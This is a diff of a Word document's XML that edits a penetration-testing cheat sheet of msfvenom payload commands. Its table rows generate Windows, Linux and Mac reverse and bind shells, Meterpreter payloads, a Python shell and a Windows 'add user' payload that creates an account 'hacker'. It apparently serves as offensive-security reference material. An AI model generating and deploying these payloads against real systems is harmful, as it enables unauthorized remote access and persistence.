+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell.elf</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Linux reverse shell x64 single stage</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>74</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -805,7 +1017,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -858,50 +1070,77 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>bind_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> RHOST= &lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Windows </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Meterpreter </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>bind shell</w:t>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Windows</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Meterpreter</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> reverse shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>341</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -909,7 +1148,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -935,52 +1174,97 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p windows/shell/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Windows CMD </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Multi Stage</w:t>
+              <w:t xml:space="preserve"> -p windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>bind_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> RHOST= &lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Windows </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Meterpreter </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>bind shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>309</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -988,19 +1272,22 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
               </w:rPr>
               <w:t>msfvenom</w:t>
             </w:r>
@@ -1009,79 +1296,74 @@
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -p</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t> windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>shell_reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>&lt;IP&gt;</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LPORT=</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>&lt;PORT&gt; -f exe &gt; shell</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-              </w:rPr>
-              <w:t>.exe</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Windows CMD Single Stage</w:t>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p windows/shell/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Windows CMD </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Multi Stage</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>341</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1089,22 +1371,19 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
               </w:rPr>
               <w:t>msfvenom</w:t>
             </w:r>
@@ -1113,47 +1392,99 @@
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -p windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>adduser</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> USER=hacker PASS=password -f exe &gt; useradd.exe</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Windows add user</w:t>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t> windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>shell_reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>&lt;IP&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LPORT=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>&lt;PORT&gt; -f exe &gt; shell</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+              </w:rPr>
+              <w:t>.exe</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Windows CMD Single Stage</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>324</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1161,7 +1492,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1187,75 +1518,81 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>osx</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>/x86/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell_reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f macho &gt; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell.macho</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Mac Reverse Shell</w:t>
+              <w:t xml:space="preserve"> -p windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>adduser</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> USER=hacker PASS=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>S3cret1234!</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -f exe &gt; useradd.exe</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Windows add user</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>273</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1263,7 +1600,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1316,16 +1653,16 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>shell_bind_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> RHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f macho &gt; </w:t>
+              <w:t>shell_reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f macho &gt; </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:proofErr w:type="gramStart"/>
@@ -1343,21 +1680,41 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Mac Bind shell</w:t>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Mac Reverse Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>65</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1365,7 +1722,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1400,72 +1757,86 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>cmd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>unix</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>reverse_python</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; shell.py</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>Python Shell</w:t>
